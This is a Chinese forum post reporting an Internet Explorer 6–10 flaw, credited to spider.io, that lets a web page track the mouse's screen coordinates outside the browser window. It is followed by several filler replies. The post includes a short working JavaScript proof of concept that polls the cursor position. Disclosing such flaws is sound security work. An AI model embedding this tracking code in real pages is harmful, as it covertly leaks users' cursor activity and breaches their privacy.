IE浏览器鼠标坐标跟踪安全风险,通杀全版本

admin

最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置，即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。 影响版本:IE6-10
Code:
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
[/td][/tr]
[/table]

xckj8z84

支持一下吧  

蜡笔小新的思念

一山不能容二虎，除非一公和一母!  

职业揍狗丶

楼上的稍等啦  

最后的战役

接到陌生电话请先说，“你好，找哪位”  

茜爱

支持一下吧  

开膛手杰克

这个贴不错！！！！！  

溶金恭绰

又看了一次